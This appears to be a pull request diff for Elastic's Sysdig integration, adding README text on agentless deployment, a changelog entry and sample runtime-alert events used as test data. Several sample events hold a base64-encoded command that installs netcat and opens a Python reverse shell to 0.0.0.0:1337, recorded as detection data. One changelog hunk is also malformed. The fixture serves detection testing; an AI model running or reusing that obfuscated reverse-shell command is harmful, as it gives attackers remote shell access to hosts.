elastic · moxarth-rathod · Jun 10, 2026 · Jun 10, 2026 · Jun 17, 2026 · kcreddy
@@ -26,6 +26,11 @@ Elastic Agent must be installed. For more details, check the Elastic Agent [inst
 
 Sysdig must be configured to output alerts to a supported output channel as defined in [Setup](#setup). The system will only receive common fields output by Sysdig's rules, meaning that if a rule does not include a desired field the rule must be edited in Sysdig to add the field.
 
+## Agentless Enabled Integration
+
+Agentless integrations allow you to collect data without having to manage Elastic Agent in your cloud. They make manual agent deployment unnecessary, so you can focus on your data instead of the agent that collects it. For more information, refer to [Agentless integrations](https://www.elastic.co/guide/en/serverless/current/security-agentless-integrations.html) and the [Agentless integrations FAQ](https://www.elastic.co/guide/en/serverless/current/agentless-integration-troubleshooting.html).
+Agentless deployments are only supported in Elastic Serverless and Elastic Cloud environments.  This functionality is in beta and is subject to change. Beta features are not subject to the support SLA of official GA features.
+
 ## Setup
 
 For step-by-step instructions on how to set up an integration, see the [Getting started](https://www.elastic.co/guide/en/starting-with-the-elasticsearch-platform-and-its-solutions/current/getting-started-observability.html) guide.

@@ -1,4 +1,12 @@
 # newer versions go on top
+- version: "2.4.0"
+  changes:
+    - description: Enable Agentless deployment.
+      type: enhancement
+      link: https://github.com/elastic/integrations/pull/19470
+    - description: Fix handling of null values in string for event data stream.
+      type: bugfix
+      link: https://github.com/elastic/integrations/pull/1
-      link: https://github.com/elastic/integrations/pull/1
+      link: https://github.com/elastic/integrations/pull/19470
-      link: https://github.com/elastic/integrations/pull/1
+      link: https://github.com/elastic/integrations/pull/19470
 - version: "2.3.0"
   changes:
     - description: Enable request trace log removal.

@@ -4,3 +4,5 @@
 {"actions":[{"afterEventNs":30000000000,"beforeEventNs":15000000000,"errMsg":"maximum number of outstanding captures (1) reached","isSuccessful":false,"token":"7d30b372-3dd9-1234-5678-403612345678","type":"capture"}],"category":"runtime","content":{"fields":{"container.id":"382abcdefd0a","container.image.repository":"gcr.io/cadvisor/cadvisor","container.image.tag":"v0.45.0","container.mounts":"/:/rootfs::false:private,/var/run:/var/run::false:private,/sys:/sys::false:private,/var/lib/docker:/var/lib/docker::false:private,/dev/disk:/dev/disk::false:private,/var/lib/kubelet/pods/e08484f0-c944-4b62-bdb3-9341e74ef7b5/etc-hosts:/etc/hosts::true:private,/var/lib/kubelet/pods/e08484f0-c944-4b62-bdb3-9341e74ef7b5/containers/cadvisor/e5f5ac18:/dev/termination-log::true:private","container.name":"cadvisor","evt.res":"SUCCESS","evt.type":"execve","group.gid":"0","group.name":"root","proc.cmdline":"cadvisor -logtostderr --enable_metrics=cpu,diskIO,memory,network,oom_event --docker_only","proc.cwd":"/","proc.exepath":"/usr/bin/cadvisor","proc.name":"cadvisor","proc.pcmdline":"runc --root /run/containerd/runc/k8s.io --log /run/containerd/io.containerd.runtime.v2.task/k8s.io/382e35271d0a388267e9ed7ab262e0735ebfbaa1fd5dc09a3645d7b22e62580a/log.json --log-format json --systemd-cgroup create --bundle /run/containerd/io.containerd.runtime.v2.task/k8s.io/382e35271d0a388267e9ed7ab262e0735ebfbaa1fd5dc09a3645d7b22e62580a --pid-file /run/containerd/io.containerd.runtime.v2.task/k8s.io/382e35271d0a388267e9ed7ab262e0735ebfbaa1fd5dc09a3645d7b22e62580a/init.pid 382e35271d0a388267e9ed7ab262e0735ebfbaa1fd5dc09a3645d7b22e62580a","proc.pid":"741051","proc.pname":"runc","proc.ppid":"741043","proc.sid":"1","user.loginname":"<NA>","user.loginuid":"-1","user.name":"root","user.uid":"0"},"origin":"Sysdig","output":"Container cadvisor having image gcr.io/cadvisor/cadvisor with sensitive mount started by user root  and parent runc (proc.name=cadvisor image=gcr.io/cadvisor/cadvisor:v0.45.0 proc.exepath=/usr/bin/cadvisor proc.pname=runc gparent=containerd-shim ggparent=systemd gggparent=<NA> mounts=/:/rootfs::false:private,/var/run:/var/run::false:private,/sys:/sys::false:private,/var/lib/docker:/var/lib/docker::false:private,/dev/disk:/dev/disk::false:private,/var/lib/kubelet/pods/e08484f0-c944-4b62-bdb3-9341e74ef7b5/etc-hosts:/etc/hosts::true:private,/var/lib/kubelet/pods/e08484f0-c944-4b62-bdb3-9341e74ef7b5/containers/cadvisor/e5f5ac18:/dev/termination-log::true:private evt.type=execve evt.res=SUCCESS proc.pid=741051 proc.cwd=/ proc.ppid=741043 proc.pcmdline=runc --root /run/containerd/runc/k8s.io --log /run/containerd/io.containerd.runtime.v2.task/k8s.io/382e35271d0a388267e9ed7ab262e0735ebfbaa1fd5dc09a3645d7b22e62580a/log.json --log-format json --systemd-cgroup create --bundle /run/containerd/io.containerd.runtime.v2.task/k8s.io/382e35271d0a388267e9ed7ab262e0735ebfbaa1fd5dc09a3645d7b22e62580a --pid-file /run/containerd/io.containerd.runtime.v2.task/k8s.io/382e35271d0a388267e9ed7ab262e0735ebfbaa1fd5dc09a3645d7b22e62580a/init.pid 382e35271d0a388267e9ed7ab262e0735ebfbaa1fd5dc09a3645d7b22e62580a proc.sid=1 user.loginuid=-1 user.uid=0 user.loginname=<NA> group.gid=0 group.name=root container.id=382e35271d0a container.name=cadvisor)","policyId":10011701,"ruleName":"Launch Sensitive Mount Container","ruleSubType":0,"ruleTags":["container","container_best_practices","container_immutability","SOC2","SOC2_CC6.1","NIST","NIST_800-190","NIST_800-190_3.4.3","NIST_800-190_3.5.5","NIST_800-53","NIST_800-53_AC-6(9)","NIST_800-53_AC-6(10)","NIST_800-53_AU-6(8)","ISO","ISO_27001","ISO_27001_A.9.2.3","HIPAA","HIPAA_164.308(a)","HIPAA_164.312(a)","HIPAA_164.312(b)","HITRUST","HITRUST_CSF","HITRUST_CSF_01.c","HITRUST_CSF_09.aa","GDPR","GDPR_32.1","GDPR_32.2","MITRE","MITRE_T1609_container_administration_command","MITRE_T1611_escape_to_host","MITRE_TA0002_execution","MITRE_TA0004_privilege_escalation","MITRE_TA0008_lateral_movement","MITRE_T1610_deploy_container","MITRE_TA0005_defense_evasion","MITRE_T1055.009_process_injection_proc_memory","MITRE_T1543_create_or_modify_system_process","CIS","oss"],"ruleType":6,"type":"workloadRuntimeDetection"},"description":"This Notable Events policy contains rules which may indicate undesired behavior including security threats. The rules are more generalized than Threat Detection policies and may result in more noise. Tuning will likely be required for the events generated from this policy.","engine":"falco","id":"1836ac8550123456789abcdefe5d827f","labels":{"container.image.digest":"sha256:9360d7421c5e9b646ea13e5ced3f8e6da80017b0144733a04b7401dd8c01a5cb","container.image.id":"3f3e5f568a6d","container.image.repo":"gcr.io/cadvisor/cadvisor","container.image.tag":"v0.45.0","container.label.io.kubernetes.container.name":"cadvisor","container.label.io.kubernetes.pod.name":"wave-autoscale-agent-abcde","container.label.io.kubernetes.pod.namespace":"wave-autoscale","container.name":"cadvisor","host.hostName":"hybrid-node","host.mac":"01:00:5e:90:10:02","kubernetes.cluster.name":"myclusterName","kubernetes.namespace.name":"wave-autoscale","kubernetes.node.name":"node04","kubernetes.pod.name":"wave-autoscale-agent-abcde"},"name":"Sysdig Runtime Notable Events","originator":"policy","rawEventCategory":"runtime","rawEventOriginator":"linuxAgent","severity":5,"source":"syscall","sourceDetails":{"subType":"container","type":"workload"},"timestamp":1744701225528350000}
 {"category":"runtime","content":{"fields":{"container.id":"4db57cd1354c","container.name":"shell-scripting","group.gid":"0","group.name":"root","proc.cmdline":"bash -c echo IyEvYmluL2Jhc2gKYXB0IHVwZGF0ZSAteTsgYXB0IGluc3RhbGwgLXkgbmNhdApuYyAtbHYgMTMzNyAmCg== | base64 -d | sh; echo cHl0aG9uMyAtYyAnaW1wb3J0IG9zLHB0eSxzb2NrZXQ7cz1zb2NrZXQuc29ja2V0KCk7cy5jb25uZWN0KCgiMC4wLjAuMCIsMTMzNykpO1tvcy5kdXAyKHMuZmlsZW5vKCksZilmb3IgZiBpbigwLDEsMildO3B0eS5zcGF3bihbInNoIiwgIi1jIiwgInNsZWVwIDU7bHMgLWE7IGV4aXQgMCJdKScK | base64 -d | sh","proc.cwd":"/","proc.exepath":"/usr/bin/bash","proc.hash.sha256":"7ebfc53f17925af4340d4218aafd16ba39b5afa8b6ac1f7adc3dd92952a2a237","proc.name":"bash","proc.pcmdline":"runc --root /run/containerd/runc/k8s.io --log /run/containerd/io.containerd.runtime.v2.task/k8s.io/4db57cd1354c54c52c52af44b6e872f23e1d70428602efe1b0b0dc39ec53e3fe/log.json --log-format json --systemd-cgroup create --bundle /run/containerd/io.containerd.runtime.v2.task/k8s.io/4db57cd1354c54c52c52af44b6e872f23e1d70428602efe1b0b0dc39ec53e3fe --pid-file /run/containerd/io.containerd.runtime.v2.task/k8s.io/4db57cd1354c54c52c52af44b6e872f23e1d70428602efe1b0b0dc39ec53e3fe/init.pid 4db57cd1354c54c52c52af44b6e872f23e1d70428602efe1b0b0dc39ec53e3fe","proc.pid":"97888","proc.pname":"runc","proc.ppid":"97881","proc.sid":"1","user.loginname":"<NA>","user.loginuid":"-1","user.name":"root","user.uid":"0"},"origin":"Sysdig","output":"Potentially malicious Shell script base64-encoded under user root on shell-scripting (proc.name=bash proc.exepath=/usr/bin/bash proc.pname=runc gparent=containerd-shim ggparent=containerd-shim gggparent=containerd proc.cmdline=bash -c echo IyEvYmluL2Jhc2gKYXB0IHVwZGF0ZSAteTsgYXB0IGluc3RhbGwgLXkgbmNhdApuYyAtbHYgMTMzNyAmCg== | base64 -d | sh; echo cHl0aG9uMyAtYyAnaW1wb3J0IG9zLHB0eSxzb2NrZXQ7cz1zb2NrZXQuc29ja2V0KCk7cy5jb25uZWN0KCgiMC4wLjAuMCIsMTMzNykpO1tvcy5kdXAyKHMuZmlsZW5vKCksZilmb3IgZiBpbigwLDEsMildO3B0eS5zcGF3bihbInNoIiwgIi1jIiwgInNsZWVwIDU7bHMgLWE7IGV4aXQgMCJdKScK | base64 -d | sh user.name=root proc.pid=97888 proc.cwd=/ proc.ppid=97881 proc.pcmdline=runc --root /run/containerd/runc/k8s.io --log /run/containerd/io.containerd.runtime.v2.task/k8s.io/4db57cd1354c54c52c52af44b6e872f23e1d70428602efe1b0b0dc39ec53e3fe/log.json --log-format json --systemd-cgroup create --bundle /run/containerd/io.containerd.runtime.v2.task/k8s.io/4db57cd1354c54c52c52af44b6e872f23e1d70428602efe1b0b0dc39ec53e3fe --pid-file /run/containerd/io.containerd.runtime.v2.task/k8s.io/4db57cd1354c54c52c52af44b6e872f23e1d70428602efe1b0b0dc39ec53e3fe/init.pid 4db57cd1354c54c52c52af44b6e872f23e1d70428602efe1b0b0dc39ec53e3fe proc.sid=1 user.uid=0 user.loginuid=-1 user.loginname=<NA> group.gid=0 group.name=root container.id=4db57cd1354c container.name=shell-scripting)","policyId":10011698,"ruleName":"Base64-encoded Shell Script Execution","ruleSubType":0,"ruleTags":["host","container","MITRE","MITRE_T1132.001_data_encoding_standard_encoding","MITRE_TA0011_command_and_control","MITRE_TA0005_defense_evasion","MITRE_T1059.004_command_and_scripting_interpreter_unix_shell","MITRE_T1059_command_and_scripting_interpreter","MITRE_TA0002_execution","MITRE_T1027_obfuscated_files_and_information","MITRE_T1140_deobfuscate_decode_files_or_information"],"ruleType":6,"type":"workloadRuntimeDetection"},"description":"This policy contains rules which Sysdig considers High Confidence of a security incident. They are tightly coupled to common attacker TTP's. They have been designed to minimize false positives but may still result in some depending on your environment.","engine":"falco","id":"183a5e0123456789zbcdef400ba6d116","labels":{"cloudProvider.account.id":"012345678912","cloudProvider.name":"gcp","cloudProvider.region":"us-central1","container.image.digest":"sha256:aa7b73608abcfb021247bbb4c111435234a0459298a6da610681097a54ca2c2a","container.image.id":"ef0f72a55bd2","container.image.repo":"docker.io/library/python","container.image.tag":"3.9.18-slim","container.label.io.kubernetes.container.name":"shell-scripting","container.label.io.kubernetes.pod.name":"shell-scripting-1234567-12345","container.label.io.kubernetes.pod.namespace":"default","container.name":"shell-scripting","gcp.location":"us-central1","gcp.projectId":"012345678912","host.hostName":"gke-cluster-gcp-demo-san-default-pool-12345678-1234","host.mac":"01:00:5e:90:10:00","kubernetes.cluster.name":"gke-alliances-demo-6","kubernetes.cronJob.name":"shell-scripting","kubernetes.job.name":"shell-scripting-29082780","kubernetes.namespace.name":"default","kubernetes.node.name":"gke-cluster-gcp-demo-san-default-pool-12345678-1234","kubernetes.pod.name":"shell-scripting-00123450-abcd5","kubernetes.workload.name":"shell-scripting","kubernetes.workload.type":"cronjob"},"name":"Sysdig Runtime Threat Detection","originator":"policy","rawEventCategory":"runtime","rawEventOriginator":"linuxAgent","severity":3,"source":"syscall","sourceDetails":{"subType":"container","type":"workload"},"timestamp":1744966800841090300}
 {"category":"runtime","content":{"fields":{"container.image.repository":"docker.io/library/python","container.name":"shell-scripting","evt.res":"SUCCESS","evt.type":"execve","group.gid":"0","group.name":"root","proc.args":"","proc.cmdline":"sh","proc.cwd":"/","proc.exepath":"/usr/bin/dash","proc.hash.sha256":"f5adb8bf0100ed0f8c7782ca5f92814e9229525a4b4e0d401cf3bea09ac960a6","proc.name":"sh","proc.pcmdline":"bash -c echo IyEvYmluL2Jhc2gKYXB0IHVwZGF0ZSAteTsgYXB0IGluc3RhbGwgLXkgbmNhdApuYyAtbHYgMTMzNyAmCg== | base64 -d | sh; echo cHl0aG9uMyAtYyAnaW1wb3J0IG9zLHB0eSxzb2NrZXQ7cz1zb2NrZXQuc29ja2V0KCk7cy5jb25uZWN0KCgiMC4wLjAuMCIsMTMzNykpO1tvcy5kdXAyKHMuZmlsZW5vKCksZilmb3IgZiBpbigwLDEsMildO3B0eS5zcGF3bihbInNoIiwgIi1jIiwgInNsZWVwIDU7bHMgLWE7IGV4aXQgMCJdKScK | base64 -d | sh","proc.pid":"4094247","proc.pid.ts":"1744772461104588229","proc.pname":"bash","proc.ppid":"4093769","proc.ppid.ts":"1744772400850031947","proc.sid":"1","user.loginname":"<NA>","user.loginuid":"-1","user.name":"root","user.uid":"0"},"origin":"Secure UI","output":"Custom rule. The shell-scripting with image docker.io/library/python by parent bash under user root (proc.name=sh proc.exepath-custom=/usr/bin/dash proc.pname=bash gparent=containerd-shim ggparent=<NA> gggparent=<NA> image=docker.io/library/python user.uid=0 proc.cmdline=sh proc.pcmdline=bash -c echo IyEvYmluL2Jhc2gKYXB0IHVwZGF0ZSAteTsgYXB0IGluc3RhbGwgLXkgbmNhdApuYyAtbHYgMTMzNyAmCg== | base64 -d | sh; echo cHl0aG9uMyAtYyAnaW1wb3J0IG9zLHB0eSxzb2NrZXQ7cz1zb2NrZXQuc29ja2V0KCk7cy5jb25uZWN0KCgiMC4wLjAuMCIsMTMzNykpO1tvcy5kdXAyKHMuZmlsZW5vKCksZilmb3IgZiBpbigwLDEsMildO3B0eS5zcGF3bihbInNoIiwgIi1jIiwgInNsZWVwIDU7bHMgLWE7IGV4aXQgMCJdKScK | base64 -d | sh user.name=root user.loginuid=-1 proc.args= container.name=shell-scripting evt.type=execve evt.res=SUCCESS proc.pid=4094247 proc.cwd=/ proc.ppid=4093769 proc.sid=1 proc.exepath=/usr/bin/dash user.loginname=<NA> group.gid=0 group.name=root proc.pid.ts=1744772461104588229 proc.ppid.ts=1744772400850031947 proc.hash.sha256=f5adb8bf0100ed0f8c7782ca5f92814e9229525a4b4e0d401cf3bea09ac960a6)","policyId":10569534,"ruleName":"My test rule custom","ruleSubType":0,"ruleTags":["My-tag-custom-1-hello-world","MITTRE-WHATEVER"],"ruleType":6,"type":"workloadRuntimeDetection"},"description":"This is just a dumb policy to test custom policies","engine":"falco","id":"1a36a012345678998765432108f1e03e","labels":{"cloudProvider.account.id":"012345678912","cloudProvider.name":"gcp","cloudProvider.region":"us-central1","container.image.digest":"sha256:aa7b73608abcfb021247bbb4c111435234a0459298a6da610681097a54ca2c2a","container.image.id":"ef0f72a55bd2","container.image.repo":"docker.io/library/python","container.image.tag":"3.9.18-slim","container.label.io.kubernetes.container.name":"shell-scripting","container.label.io.kubernetes.pod.name":"shell-scripting-29079540-cqf5n","container.label.io.kubernetes.pod.namespace":"default","container.name":"shell-scripting","gcp.location":"us-central1","gcp.projectId":"012345678912","host.hostName":"gke-cluster-gcp-demo-san-default-pool-12345678-abcd","host.mac":"01:00:5e:90:10:00","kubernetes.cluster.name":"gke-alliances-demo-6","kubernetes.cronJob.name":"shell-scripting","kubernetes.job.name":"shell-scripting-29079540","kubernetes.namespace.name":"default","kubernetes.node.name":"gke-cluster-gcp-demo-san-default-pool-12345678-abcd","kubernetes.pod.name":"shell-scripting-12345678-abcde","kubernetes.workload.name":"shell-scripting","kubernetes.workload.type":"cronjob"},"name":"Manuel test policy","originator":"policy","rawEventCategory":"runtime","rawEventOriginator":"linuxAgent","severity":4,"source":"syscall","sourceDetails":{"subType":"container","type":"workload"},"timestamp":1744772461195149800}
+{"category":"runtime","content":{"fields":{"container.image.repository":"docker.io/manuelbcd/py-goat","container.name":"client","evt.type":"execve","fd.cport":"<NA>","fd.name":"<NA>","fd.sport":"<NA>","proc.cmdline":"g++ -c -I./liblinear -I./liblua payload.cc -o payload.o","proc.name":"g++","proc.pid":"{}","proc.ppid":"<NA>","proc.pid.ts":"1779960622186767074","proc.pname":"make","proc.ppid.ts":"1779960534106633936","proc.sid":"<NA>","user.loginname":"<NA>","user.loginuid":"-1","user.name":"root","user.uid":"0"},"origin":"Sysdig","policyId":10011704,"ruleName":"Launch Code Compiler Tool in Container","ruleSubType":0,"ruleTags":["container"],"ruleType":6,"type":"workloadRuntimeDetection"},"engine":"falco","id":"18b3b0c157a37ff81ee0ffde058bb9c7","labels":{},"name":"Sysdig Runtime Activity Logs","originator":"policy","rawEventCategory":"runtime","rawEventOriginator":"linuxAgent","severity":7,"source":"syscall","sourceDetails":{"subType":"container","type":"workload"},"timestamp":1779960622186987500}
+{"category":"runtime","content":{"fields":{"container.name":"client","evt.type":"execve","proc.cmdline":"g++ -c","proc.name":"g++","proc.pid.ts":"1779968132639147461","proc.pname":"make","proc.ppid.ts":"1779968024206444718","user.name":"root","user.uid":"0"},"origin":"Sysdig","output":"Detected a code compiler g++ usage on client","policyId":10011704,"ruleName":"Launch Code Compiler Tool in Container","ruleSubType":0,"ruleTags":["container"],"ruleType":6,"type":"workloadRuntimeDetection"},"description":"Runtime activity","engine":"falco","id":"18b3b796017bece0da1278186b9f1333","labels":{"container.name":"client"},"name":"Sysdig Runtime Activity Logs","originator":"policy","rawEventCategory":"runtime","rawEventOriginator":"linuxAgent","severity":7,"source":"syscall","sourceDetails":{"subType":"container","type":"workload"},"timestamp":1779968132639354000}